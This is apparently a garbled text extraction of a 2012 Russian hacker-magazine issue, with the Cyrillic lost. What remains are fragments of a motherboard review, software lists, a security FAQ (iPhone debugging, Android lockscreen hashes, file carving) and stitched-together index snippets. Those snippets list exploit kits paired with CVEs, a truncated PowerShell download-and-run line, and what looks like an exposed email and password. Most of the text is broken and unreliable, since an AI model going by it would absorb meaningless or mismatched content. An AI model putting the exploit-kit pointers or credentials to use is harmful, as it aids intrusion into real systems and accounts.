cookie HTTP-. , . z
133
FERRUM
!

INTEL X79 EXPRESS
,
,

.
, Intel.
.
Intel X79 Express
.
. , ,
Intel Sandy Bridge-E
, 200 , . 350 .

. ,
, -
2530 .
, ,
,
. , , !
!
. , - .
,
Intel X79 Express Intel P67
Express Intel Z68 Express.
.
, SSD-
BCLK.
USB 2.0, SATA-II SATA 3.0.
Intel X79 Express
Intel Sandy Bridge-E. -
134

40 PCI Express 3.0
DDR3.
, Intel Sandy Bridge-E ,
.
, , .
.
X79
PCI Express 3.0

. -
. ,
AMD Radeon HD 79XX
PCI Express 3.0.
, ,
c PCI Express 2.0, ,
. ,
.
.
DDR3 ,
. , ,
.

: .
ASRock X79 Extreme4-M

ASUS Rampage IV Extreme
Foxconn Quantumian 1
GIGABYTE GA-X79-UD5
Intel DX79SI
MSI X79MA-GD45

:
Intel Core i7-3960X, 3,3
:
Thermaltake Frio OCK
:
MSI Twin Frozr II HD 5830, 1024
:
G.Skill F3-17000CL9D-8GBXM,
44
:
Corsair CSSD-F120GB2, 120
:
ENERMAX Platimax, 750
:
Windows 7

.

25, 13.33. ,

, BCLK
CPU RAM. , CPU Strap,

125, 166 250 .

, 125
.
166
,
.
250
, .
125 .
.

Intel Sandy Bridge-E Intel Core i7-3820
125 36 = 4500 .
!
, .
,
.

wPrime
1.55 ( 1024m), WinRAR 4.0 ( ) Super Pi 1.5XS ( 1m).
07 /162/ 2012
ASROCK X79 EXTREME4-M

, 79- - mATX ?
!

. , Extreme
ATX- ASRock Extreme3, Extreme4,
Extreme6GB, Extreme7 Extreme9.
- mATX ,
. , PCI Express x16 PCI.
PEG 16 + 16 + 8. 3-Way SLI
3-Way CrossFireX :
. , - mATX-
. SLI/CrossFireX !
/ POST-.
BIOS.
.
, .
. , ,
X-FAN.
, , . , CPU
Strap, 125 .
, . ASRock X79 Extreme4-M
. 105 .
7000
.
ASUS RAMPAGE IV EXTREME

, ,
, ASUS
Rampage IV Extreme. , . , PCI
Express x16. 16 + 16 + 16 + 16.
8. , PEG PCI Express x1.
ASUS Rampage IV Extreme RoG (Republic of Gamers),
, - . , OC Zone /
, POST,
. PCI Express, LN2 Slow.
?
! OC Key. I/O ,
Windows BIOS. . , -
.
, , Extreme
Engine Digi+ II.
, , .
, .
, ASUS Rampage IV
Extreme .
133 !
13 000
.
07 /162/ 2012
135
FERRUM
FOXCONN QUANTUMIAN 1
, . /
. DIMM LED-
POST- ,
. .
Foxconn Quantumian 1 32 .
PCI Express x16.
.
16 + 16. ,
PCI Express x1 PCI.
PCI Express x16
16 + 8 + 8 + 8.
. BIOS , ! Performance
.
. BIOS.
.
VCore, VTT , . ,
, 0,97 .
Default. BIOS Foxconn Quantumian 1
132,5 . ! !
9000
.
GIGABYTE GA-X79-UD5
GIGABYTE GA-X79-UD5
79- .
- E-ATX
DIMM, PCI Express x16, PCI Express x1 PCI.
Power,
. OC-Dual
BIOS, , Clear CMOS.
SATA. GIGABYTE GA-X79-UD5 !
PCI-E-
Bluetooth- Wi-Fi-. , .
3D Power 3D BIOS . : GIGABYTE GA-X79-UD3,
GIGABYTE GA-X79-UD5 ,
.
.
130 .
4DDR3, 10662400
3PCI Express x16, 1PCI
4SATA II, 3SATA 3.0, 1eSATA 3.0
Ethernet, 10/100/1000 /
:
:
7.1 CH, HDA

6USB 2.0, 2USB 3.0, 2S/PDIF,
1eSATA, 1IEEE1394, 1RJ-45, 2PS/2,
6
mATX
136
ASRock X79
Extreme4-M
:
:
:
:
-:
9000
Foxconn Quantumian1
ASUS Rampage IV
Extreme
8DDR3, 10662400
5PCI Express x16, 1PCI Express x1
Ethernet, 10/100/1000 /; Bluetooth v2.1
+ EDR
7.1 CH, HDA
8USB 2.0, 4USB 3.0, 1S/PDIF, 1Bluetooth,
2eSATA, 1RJ-45, 1PS/2, 5
4DDR3, 10662400
4PCI Express x16, 1PCI Express x1, 1PCI
Ethernet, 10/100/1000 /
E-ATX
ATX
7.1 CH, HDA

6USB 2.0, 2USB 3.0, 1S/PDIF, 2eSATA,
2RJ-45, 1PS/2, 6
07 /162/ 2012
INTEL DX79SI
! , Intel
DX79SI. , Intel ? , Intel Extreme Edition
.
Intel DX79SI DIMM, 64 . , PCI
Express x16, 16 + 16 + 16.
PCI Express x1, PCI.
SATA- ,
Intel X79 Express . . , , . Intel DX79SI
Bluetooth Wi-Fi. USB 3.0.
Intel DX79SI . ,
, 104,7 .
. . ,
LED- POST-. ,
hwbot.org,
DELLY, Intel DX79SI 135 .
10 000
.
MSI X79MA-GD45
MSI X79MA-GD45 .
!
DIMM ,
.
64 2400 . PCI
Express x16 3.0 ,
. ,
, PCI Express x1.
MSI
Military Class. Intel
X79 Express .
DrMOS II, 130 , SFC, Hi-c
.
. !

130 . , .
7000
.

GIGABYTE GAX79-UD5
Intel DX79SI
Intel Core i73960X
8DDR3, 10662133
3PCI Express x16, 2PCI Express x1, 1PCI
Ethernet, 10/100/1000 /; Bluetooth v4.0;
Wi-Fi 802.11n
7.1 CH, HDA
7USB 2.0, 2USB 3.0, 1S/PDIF, 2eSATA,
1IEEE 1394, 1RJ-45, 1PS/2, 5
8DDR3, 10662400
3PCI Express x16, 2PCI Express x1,
1PCI, 4SATA II, 2SATA 3.0
Ethernet, 10/100/1000 /;
Bluetooth; Wi-Fi
10 CH, HDA
6USB 2.0, 2USB 3.0, 1S/PDIF,
1IEEE 1394, 2RJ-45, 5
4DDR3, 10662400
2PCI Express x16, 2PCI Express x1
4SATA II, 2SATA 3.0
Ethernet, 10/100/1000 /
E-ATX
ATX
mATX
07 /162/ 2012
7.1 CH, HDA

6USB 2.0, 2USB 3.0, 2S/PDIF,
1RJ-45, 1PS/2, 6
,
, .

,
,

. Foxconn Quantumian 1
, .
, RoG-
, Quantumian 1
. z
137

WPRIME 1.55 1024M, C
SUPER PI 1.5XS 1M, C
MSI X79MA-GD45
MSI X79MA-GD45
Intel DX79SI
Intel DX79SI
GIGABYTE GA-X79-UD5
GIGABYTE GA-X79-UD5
FOXCONN Quantumian 1

0
50
100
150
200
250
0 2 4 6 8 10 12 14 18 20
Super Pi 1.5XS
BCLK,
MSI X79MA-GD45
Intel DX79SI
GIGABYTE GA-X79-UD5
0
20
40
60
80
100
120
140
. ,
WINRAR, /
MSI X79MA-GD45
Intel DX79SI
GIGABYTE GA-X79-UD5
0
500
1000
1500
2000
Intel , ASUS Rampage IV Extreme
2500
3000
3500
4000
>Net
Ammyy Admin 3.0
Colasoft MAC Scanner Free 1.1
Echofon 1.0.5
Gmvault 1.5
Mail Notifier Beta
Maxuden Radio Station 2.4
NetBScanner 1.0
NetSpeedMonitor 2.5.4.0
ooVoo 3.5.1
Snackr 0.41
Tango 1.6
TCPEye 1.0
Tiggit
>Multimedia
aTunes 2.1.0
CloudTune 1.9
Convertidor De Videos
Falco GIF Animator 3.9
FreeMake Video Downloader 3.0.1
FreeVimager 3.9.9
LameXP 4.04
MediaMonkey 4.0.3
Metanull 1.1
Passport Photo Maker
Redimensionneur 1.0.1
Ringtone Maker 2.4
SuperEasy Codec Checker 1.09
Textaizer Pro 4.3
TinEye Client 1.1
Tomahawk 0.4.2
>Misc
CaPNotifier 1.1.1.0
EyeDefender 1.09
FiletypeID 0.2.1.7
Instant Elevator Music 2.1
Just Manager 0.1 Alpha
MacType 2012
Media Preview 1.2
Multibar 1.1.1.1
MultiWall 1.0.16
PDF Preview 1.0
Proto 0.6.9.7
sTabLauncher 2.2.3
ViPad 1.0
ViStart 2.0
WinMend File Splitter 1.2.9
XWidget 1.4
>>WINDOWS
>Development
BlueGriffon 1.5.2
Boost 1.49.0
DbVisualizer 8.0.9
dirtyJOE 1.5
FaceSDK 4.0
GanttProject 2.5.2
GDIView 1.15
Gobby 0.5
InstallSimple 2.5
mongoDB 2.0.5
Parrot 4.4.0
RocketSVN for Visual Studio 1.0.1
RocketSVN Server 1.0
SciTE 3.2.0
Sqliteman 1.2.2
>>UNIX
>Desktop
Aegisub 2.1.9
Devede 3.22.0
Dvdx 4.0.1.0
Ede 2.0
Flvtomp3 1.2.1
Gimp 2.8.0
Impro-visor 5.16
Kdenlive 0.9
Openoffice 3.4
Outwiker 1.6.0
Phatch 0.2.7.1
Rosegarden 12.04
Scribus 1.4.1
Shutter 0.88.3
Specto 0.4.1
Sview 12.05
>System
DrivePurge 1.0
DXVA Checker 2.8.2
Ext2Fsd 0.51
GeekUninstaller 1.0.1.3
iReboot 1.1.1
JetClean 1.2.0
Metamorphose 1.1.2
Prio 1.98
ProcessEye 1.0
Security AutoRun 1.3
SlimCleaner 3.0
SSD Fresh
StartupEye 1.0
Undela 3.8.3
WinScheduler 7.5.2
Wise Data Recovery 3.11
>Security
AxCrypt 1.7
BitDisk 5.2.0.8
Browser Cleaner 1.2
BugChecker 0.1.149
CERT Failure Observation Engine
(FOE) 1.0
Cintruder 0.2
DeEgger Embedder 1.09
Drivesploit
Egurra 0.1
EMET 3.0
Knock 1.5
Nmap 6.0
Ophcrack 3.4.0
Ostinato 0.5
Rips 0.53
Scapy 2.2.0
Secure Bin 1.0
Secure Wipe 1.0
SIPVicious 0.2.7
Sqlcake 1.1
SQLmap GUI
SteadyCrypt 2.4
USB Disabler 1.1
VERA 0.3
Waterfox 12.0
Wi-Fi Inspector 1.2.1.4
Zona 1.0
>Security
APKinspector BETA
cintruder 0.2
Drivesploit
Graphem 0.3.2
Hacme Bank - Android v1.0
Ispfw 10
METASM 0.1
netsniff-ng 0.5.7
Nmap 6
Nmap 6.00
slowhttptest 1.4
spooftooph 0.5.2
sqlcake 1.1
SQLmap GUI
SWFREtools
Turboshredder 0.033
Usbcryptformat 12.05.20
Volatility 2.0
Wifite 2.0
Wireshark 1.6.8
>Net
Backup-gmail 0.1.2.1
Coccinella 0.96.20
Deluge 1.3.5
Firefox 12.0
Grive 0.0.4
Homer-onferencing 0.23
Hostapd 1.0
Jitsi 1.1
Lightspark 0.5.7
Nethogs 0.8.0
Opera 11.64
Scr 0.8
Sflphone 1.1.0
Smuxi 0.8.9.2
Tickr 0.6.0
Transmission 2.52
Tv-maxe 0.07
Ymono 5.0a
>Games
Turtle_arena 0.6
Ufoai 2.4
>Devel
Ajaxml
Aptana 3.1.2
Atom
Betterpoeditor 1.0
Catalyst 5.90012
Codeigniter 2.1.0
Cppcheck 1.54
Firmin 1.0.0
Ganttproject 2.5.2
Gpac 0.5.0
Llvm 3.1
Monodevelop 3.0.1
Netsgraph 1.0.004
Opengrok 0.11.1
Perl 5.16.0
Qtcreator 2.5
Tig 1.0
Zengl 0.3.0b3
Xfce 4.10
Zxtune b1716
>>MAC
Ambientweet 1.1
Bartender 0.9.05
Blender 2.63a
CheatSheet 1.0.1
CornerClick 0.9
Friendz 4.2.5
Gmvault 1.5
ipswDownloader 2.2.0
Loginox 1.0.6b5
Mac Malware Remover 1.1.5
MagicPrefs
Quicksilver 68
SMARTReporter 3.0.1
SMBUp 1.4.0
SourceTree 1.4.2
SpeedTao 0.9.5
Tomahawk 0.4.2
Trillian 1.3.37
>X-distr
Linux Mint 13
>System
Bluelog 1.0.3
Ck 3.3
Drizzle 7.2.2a
Laptop_mode 1.61
Linaro 12.04
Linux 3.4
Loganalyzer 3.4.3
Nomachinenx 3.5.0
Nvidia 295.53
Orientdb 1.0
Pulseaudio 2.0
Sdfs 1.1.3
Systemrescuecd 2.7.1
Virtualbox 4.1.16
Wine_etersoft
>Server
Apache 2.2.22
Asterisk 10.4.1
Bind 9.9.1
Cups 1.5.3
Dhcp 4.2.3-p2
Dovecot 2.1.7
Freeradius 2.1.12
Lighttpd 1.4.30
Mysql 5.5.24
Nsd 3.2.10
Openldap 2.4.31
Openvpn 2.2.2
Postfix 2.9.3
Postgresql 9.1.3
Pure-ftpd 1.0.35
Samba 3.6.5
Sendmail 8.14.5
Snort 2.9.2.3
Sqlite 3.7.12.1
Squid 3.1.19
Syslog-ng 3.3.5
Unbound 1.4.17
Vsftpd 3.0.0
07 (162) 2012

glqdoa{}
pqdtcgomk
-!),25'2/50

kdldcedo
n_idqmacj~
7).$/73

f_vdk
imcgq{
l_3#!,!

*04

1)1$(*
8889",&136

odimkdlcma_ll_~
k
HIGHLOAD
FAQ
, Digital Security (cherboff@gmail.com)
FAQ

FAQ@REAL.XAKEP.RU

IP ,
?

A ,
, .

,
. Linux ifconfig:
ifconfig eth0:alias1
alias1 .
Windows
TCP/IP.
IP IP- .
,
Q Bitlocker,
- Linux?
, Windows Vista
A
Bitlocker. ,

. ,

(Linux / Mac OS X)
dislocker (bit.ly/dislocker).
,
.
,

NTFS. ( ,

.)

FUSE.
,
(
, ).
USB, .

, .

VLAN?
, ,
A VLAN,
.
, , -
, trunk (
,
, ),
.
VLAN ID
. Linux
8021q, Ethernet.
sudo modprobe 8021q
vconfig (
-
,
vlan). , VLAN ID = 1337 eth1:
sudo vconfig add eth1 1337

eth1.1337,
MAC- IP-.
VLAN ID 1337. Windows, ,
,
.
, -
IPHONE?
,
IDA Hex-Rays.
,
,
. ,
iOS,
. ,

IDA +
debugserver (GDB-server iOS).
140
OSX (
) c iOS SDK iOS- . iPhone
( XCode) , ,
( root) .

SSH. ,
, IDA.

iOS SDK fat-elf
( ,
,
) . , iPhone.
lipo
ARM7:
lipo -thin armv7 /Developer/usr/bin/

debugserver -output gdb-srv
07 /162/ 2012
FAQ
,
.
VLAN ID
,
.
.

PROSet, Intel.

VLAN ID.
,
LAN, DHCP
, ?
192.168.0.1,
. ?
,
A .
-
.

MAC-
, ,
( pingscan
ARP-). TCP SYN-
IP ,
, MAC-

(
IP- ,
).
, ,
(- IP-
),
, .
, ! ,

. gatewayfinder (https://bit.ly/gwfinder).
Python
scapy, TCP.
IP, ,
MAC.
.

,
,
. ,
,
,
XML (pastebin.com/g8SFczFz) iPhone.

(
XML)
ldid. Cydia
( AppStore'
):
ldid -Srules.xml gdb-srv
07 /162/ 2012
Brainfuck, JS.
: ,
- ,
,
JS- Revelo (bit.ly/Revelo).
,

,
DOM,

.
,
,
.

JAVA SCRIPT

.
,
?
Revelo JavaScript
, .

Notes. -x :
springboard.
~/ gdb-srv -x spring host:1337 \

/Applications/MobileNotes.app/MobileNotes
GDB

.
IDA
GDB (Debugger
Attach Remote GDB).
(Debug options
Edit Exeptions)
SIGSTOP, Stop program.
, IP
, iPhone.
, ,
iOS-,
.
141
FAQ

Flash-.
Flash
A HTML5, Flash
-

.
,
, , .

, . ,

,
SWF Investigator (adobe.ly/swfinv),

. -,
Adobe Labs! , ,

?
SWF-
,
,
.
- , ,
, flashvars Action
Message Format. AtcionScript, HEX-
Local Shared
Objects (Flash cookie).
byte[] hashed = null;

try {
byte[] saltedPassword =
(password + getSalt()).getBytes();
byte[] sha1 = MessageDigest.
getInstance(algo = "SHA-1").
digest(saltedPassword);
byte[] md5 = MessageDigest.
getInstance(algo = "MD5").
digest(saltedPassword);
hashed = (toHex(sha1) + toHex(md5)).
getBytes();
}
catch (NoSuchAlgorithmException e) {
Log.w(TAG, "Failed to encode
string because of missing
algorithm: " + algo);
}
return hashed;
Android
?
, 2.2
A Android

, .
, , .
:
public byte[] passwordToHash(

String password)
{
if (password == null) {
return null;
}
String algo = null;
,
, .
/data/system/password.
key, ,
. ,
, lockscreen.password_salt
SQLite, , ,
/data/data/com.android.providers.
settings/databases/settings.db.

,
.
?
,
A
,

Scalpel (bit.ly/frscscalpel),
.
,

.

,
.
, ,

. -

,

,
SCALPEL
142
.
PDF:
pdf
5000000
%PDF
%EOF\x0d
REVERSE
pdf
,
, , %PDF
%EOF\x0d .
REVERSE
,
. ,
.
Ctrl + C
bash
-
.
- ^Cuser@hostname:~#.
,
- ?
bash, ,
A ,
,
.

, ,
:).
,

( ,
#
).
,
ESC-, .
:
PS1="\[\033[G\]$PS1"

$PS1, .bashrc
(
).
RFC-
?

A
,
, ,

.
, ,

, ,
,
RFC ,
Pretty-rfc (bit.ly/prettyrfc).
,
. z
07 /162/ 2012
12 2200 .
6 1260 .
,
!
.
: 210

GOOGLE CHROME 030
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
LULZSEC / FOX NEWS
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .

WINDOWS 7
PHPMYADMIN
064

ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS

+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (

, , ).
FAQ
WWW2
LOAD IMPACT
loadimpact.com
, -
( , ), ab ( Apache) Tsung.
- ? . , .
Load Impact 50 000
.
. , . Load Impact
. ,
.
SQL-
sqlfiddle.com
SQL , ,
, . , , SQL Fiddle . ,
SQL,
SQL- . ,
, , (Execution Plan). : MS SQL Server, MySQL, Oracle, PostgreSQL, SQLite.
( Fiddle) ,
, .
snag.gy
,
. , (,
- ),
. , , ,
.
(,
Print Screen), snaggy
, .
.
Web 2.0
IRC-
https://irccloud.com
, #xakep
. IRC, ,
.
-
. IRC- ,
( mIRC),
-. IRCCloud, ,
. , - .
SQL FIDDLE
SNAGGY
IRCCLOUD
144
07 /162/ 2012

Хакер 2012 07 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2012 07 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

056

RIM BLACKBERRY 10,

WESTERN DIGITAL SCSI

+7 (495) 741 00 04 www.kyoceradocumentsolutions.ru

KYOCERA Document Solutions www.kyoceradocumentsolutions.com

MICROSOFT Security Essentials 4.0.

SAMSUNG GALAXY S III

KICKSTARTER PEBBLE E-PAPER

, Adobe , Photoshop, Illustrator

@i0n1c ajitbtw@gmail.com Pass Ajit12345

CVE-2011-0611: Flash PDF

(. SEH Structured Exception

FACEBOOK . 2012- 901 .

SOPHOS, Mac Windows, Mac OS X.

Webby Awards 2012 ,

, Scratch, stencyl (www.stencyl.com).

Layer One DC949 (dc949.org)

ACK- (0d 00 00 00 00), iOS

base{log_debug = on; log_info = on; log = "file:/tmp/

200 ( 200 HTTP--,

@powershell -NoProfile -ExecutionPolicy unrestricted \

SSH- Windows PuTTY

Chocolatey apt-get Windows. ,

600 + 1800*3 = 6000 $

GreenDog , Digital Security (twitter.com/antyurin)

<input type="hidden" name="post_category%5B%5D" value="0"/>

Microsoft Incremental Linker Integer Overflow

BASE SCORE: 7.2

XSS Github, Ruby

ROP-, MS Office 2010

, SMB (Server Message

, Digital Security (twitter.com/asintsov)

VMWARE VCENTER ORCHESTRATOR

Black Hat ;-)

CGI-. Apache , RFC:

D1g1 , Digital Security (twitter.com/evdokimovds)

Intel IA32 (16/32/64 bits), MIPS PPC.

SWFREtools Flash-. SOURCE Boston 2011 Sebastian Porst.

drive-by (: Google Anti-Malware Team)

Eleonore Exploit Kit

MDAC BlackHole Exploit Kit ( )

Microsoft Data Access

CVE-2006-0003 (Microsoft Data Access Components (MDAC));

BlackHole Exploit Kit ( )

Eleonore Exploit Kit

CVE-2006-0003 (Microsoft Data Access Components (MDAC));

Eleonore Exploit Kit ( )

CVE-2006-003 (Microsoft Data Access Components (MDAC));

CVE-2010-0840 (Java OBE);

Phoenix Exploits Kit

CVE-2006-0003 (Microsoft Data Access Components (MDAC));

Phoenix Exploits Kit

Sakura Exploit Pack

Sakura Exploit Pack

Sakura Exploit Pack

Scala IDE Eclipse Scala

case classes, equals, hashCode, toString :

case timeRegex(hh, mm, ss) => println(hh, mm, ss)

PAUL PHILLIPS AKA DOT-COM

SCALA DAYS 2012

int CRYPTOPP_FASTCALL Baseline_Add(

(a + bx)(c + dx) = ac + (ac + bd (a b)(c d))x + bdx^2